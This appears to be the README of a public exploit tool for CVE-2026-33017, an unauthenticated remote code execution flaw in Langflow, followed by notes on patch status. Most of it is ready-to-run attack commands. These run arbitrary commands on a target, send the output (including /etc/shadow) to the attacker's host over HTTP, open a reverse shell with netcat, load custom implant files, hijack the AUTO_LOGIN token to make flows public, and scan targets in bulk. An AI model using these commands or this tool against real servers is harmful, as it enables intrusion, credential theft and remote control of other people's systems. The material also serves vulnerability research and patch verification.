## https://sploitus.com/exploit?id=FEF5404F-AFD2-53B8-8B26-93FEAB64EA6D
# CVE-2026-33017 - Langflow Unauthenticated RCE
```
_____
/ \
| () () |
\ ^ /
|||||
```
> **exec() with no auth, no sandbox, no hope.**
Langflow chat.py -> start_flow_build() -> build_graph_from_data()
-> Graph.from_payload() -> loading.py -> eval.py create_class()
-> validate.py prepare_global_scope() -> exec(compiled_code)
-> arbitrary code runs as the server process. game over.
```
## Install
```bash
git clone https://github.com/oscarmine/CVE-2026-33017.git
cd CVE-2026-33017
pip install requests
```
## Usage
### Recon - check if target is vulnerable
```bash
python3 exploit.py --url http://target:7860 --check
```
### Blind command execution
```bash
python3 exploit.py --url http://target:7860 --cmd "id"
```
### Exfiltrate output via GET callback (base64 in URL path)
```bash
# Terminal 1: start listener
python3 -m http.server 8080
# Terminal 2: fire exploit
python3 exploit.py --url http://target:7860 --cmd "id" \
--callback-get http://your-ip:8080
# Decode the base64 from your listener logs:
echo "dWlkPTEwMDAo..." | base64 -d
```
### Exfiltrate output via POST callback (raw output in body)
```bash
# Terminal 1: start listener
nc -l 8080
# Terminal 2: fire exploit
python3 exploit.py --url http://target:7860 --cmd "cat /etc/shadow" \
--callback-post http://your-ip:8080
# Raw output lands directly in the POST body - no decoding needed
```
### Reverse shell
```bash
# Terminal 1: start listener
nc -l 4444
# Terminal 2: fire exploit
python3 exploit.py --url http://target:7860 --revshell your-ip 4444
```
### Custom Python payload
```bash
python3 exploit.py --url http://target:7860 --payload-file implant.py
```
Payload file rules:
- Code runs at module level via `exec()` inside `prepare_global_scope()`
- Must use **assignments** (e.g. `_x = os.popen(...).read()`) because the AST filter only executes `Assign`, `FunctionDef`, `ClassDef` nodes
- Blocking calls should use `threading.Thread(daemon=True)` to avoid killing the async event loop
### Auto-promote private flows
When no PUBLIC flows exist but AUTO_LOGIN is enabled (default in many deployments):
```bash
python3 exploit.py --url http://target:7860 --auto-promote --cmd "id"
```
This hijacks the AUTO_LOGIN token, PATCHes the first flow to PUBLIC, then exploits it.
### Bulk scan
Scan multiple targets from a file (vulnerability check only):
```bash
python3 exploit.py --scan-file targets.txt
python3 exploit.py --scan-file targets.txt --threads 20 --scan-output results.txt
```
**targets.txt** format:
```
http://10.10.10.5:7860
http://10.10.10.6:7860
192.168.1.100:7860
# comments are ignored
```
Output shows:
- Version detection (vulnerable / patched)
- AUTO_LOGIN status (free token = easy escalation)
- Number of public flows (ready to exploit immediately)
### Proxy through Burp
```bash
python3 exploit.py --url http://target:7860 --cmd "id" \
--proxy http://127.0.0.1:8080
```
## How it works
1. **Version check** - probes `/api/v1/version` to fingerprint the target
2. **Flow discovery** - uses AUTO_LOGIN (if enabled) to enumerate flows and find PUBLIC ones
3. **Payload injection** - crafts a minimal flow graph with a `CustomComponent` node containing malicious Python in the `code` field
4. **Code execution** - POSTs to `/api/v1/build_public_tmp/{flow_id}/flow` with the crafted `data` parameter. Langflow compiles the graph, which calls `create_class()` -> `prepare_global_scope()` -> `exec()` on the attacker's code
The fix in v1.9.0 removes the `data` parameter entirely, forcing the endpoint to only use stored flow data from the database.
## Patch analysis
| Version | Status |
|---|---|
| <= 1.8.1 | Vulnerable |
| 1.8.2 | Claimed fix in changelog but **code was never changed** (JFrog confirmed) |
| 1.9.0-dev0 to dev11 | Still vulnerable |
| **1.9.0** | **Actually fixed** - `data` parameter removed from endpoint |
## References
- [NVD - CVE-2026-33017](https://nvd.nist.gov/vuln/detail/CVE-2026-33017)
- [JFrog Research - patch bypass analysis](https://research.jfrog.com/post/langflow-latest-version-was-not-fixed/)
- [Sysdig - exploitation in 20 hours](https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours)
- [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017)
- [Fix commit](https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0)
- GitHub Advisory: GHSA-rvqx-wpfh-mfx7
## Disclaimer
This tool is for **authorized security research only**. Only use against systems you have explicit permission to test. The author is not responsible for misuse.